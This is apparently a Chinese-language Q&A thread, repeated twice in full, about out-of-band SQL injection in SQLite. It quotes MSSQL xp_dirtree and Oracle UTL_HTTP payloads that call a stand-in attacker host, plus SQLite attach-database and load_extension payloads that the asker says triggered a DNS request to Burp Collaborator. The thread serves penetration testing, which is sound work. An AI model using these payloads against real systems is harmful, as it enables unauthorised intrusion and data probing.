sqlite3 中的带外 sql 注入?
Out of band sql injection in sqlite3?
是否可以在 sqlite3 数据库中进行带外 sql 注入?
我的意思是如果我们有 Microsoft SQL 服务器数据库,我们可以使用类似这样的东西
https://example.com/products.aspx?id=1;EXEC master..xp_dirtree >'\test.attacker.com\' --
对于 Oracle,我们可以使用这个
Select * from products where >id=1||UTL_HTTP.request('http://test.attacker.com/') --
在上述两种情况下,都会有一个 HTTP 请求发送到 http://test.attacker.com。 sqlite3 中是否有类似的东西发送 http 请求以确认带外注入?
我试着在这里查找,但我没有看到任何可用于发送 http 请求的内容。
我没有直接回答这个问题的专业知识,但我对这类问题有一般性的建议。
您必须区分 SQL 注入漏洞和 利用 此类漏洞。而后者根本不重要。
只要存在漏洞,就会被利用,这样那样。使用哪个特定漏洞并没有太大区别。
因此,就保护而言,您根本不关心不同的漏洞利用技术。您所需要做的就是修复漏洞,它会立即排除所有可能的漏洞利用。
我在这里得到了答案https://youtu.be/ha6LD1-RiJU?t=901。我尝试了两种选择
sqlite> attach database '/net/rc752wcuose5e4m5ifm4nodmjdpdd2.burpcollaborator.ne
t/z' as z;
Error: unable to open database: /net/rc752wcuose5e4m5ifm4nodmjdpdd2.burpcollabor
ator.net/z
还有这个
sqlite> select load_extension('//4x2in9x795zizh7i3s7h81yz4qamyb.burpcollaborator
.net');
Error: The specified module could not be found.
我在 Burp Collaborator 中收到了第二个有效负载的 DNS 请求,即
select load_extension('//4x2in9x795zizh7i3s7h81yz4qamyb.burpcollaborator
.net');
是否可以在 sqlite3 数据库中进行带外 sql 注入?
我的意思是如果我们有 Microsoft SQL 服务器数据库,我们可以使用类似这样的东西
https://example.com/products.aspx?id=1;EXEC master..xp_dirtree >'\test.attacker.com\' --
对于 Oracle,我们可以使用这个
Select * from products where >id=1||UTL_HTTP.request('http://test.attacker.com/') --
在上述两种情况下,都会有一个 HTTP 请求发送到 http://test.attacker.com。 sqlite3 中是否有类似的东西发送 http 请求以确认带外注入?
我试着在这里查找,但我没有看到任何可用于发送 http 请求的内容。
我没有直接回答这个问题的专业知识,但我对这类问题有一般性的建议。
您必须区分 SQL 注入漏洞和 利用 此类漏洞。而后者根本不重要。
只要存在漏洞,就会被利用,这样那样。使用哪个特定漏洞并没有太大区别。
因此,就保护而言,您根本不关心不同的漏洞利用技术。您所需要做的就是修复漏洞,它会立即排除所有可能的漏洞利用。
我在这里得到了答案https://youtu.be/ha6LD1-RiJU?t=901。我尝试了两种选择
sqlite> attach database '/net/rc752wcuose5e4m5ifm4nodmjdpdd2.burpcollaborator.ne
t/z' as z;
Error: unable to open database: /net/rc752wcuose5e4m5ifm4nodmjdpdd2.burpcollabor
ator.net/z
还有这个
sqlite> select load_extension('//4x2in9x795zizh7i3s7h81yz4qamyb.burpcollaborator
.net');
Error: The specified module could not be found.
我在 Burp Collaborator 中收到了第二个有效负载的 DNS 请求,即
select load_extension('//4x2in9x795zizh7i3s7h81yz4qamyb.burpcollaborator
.net');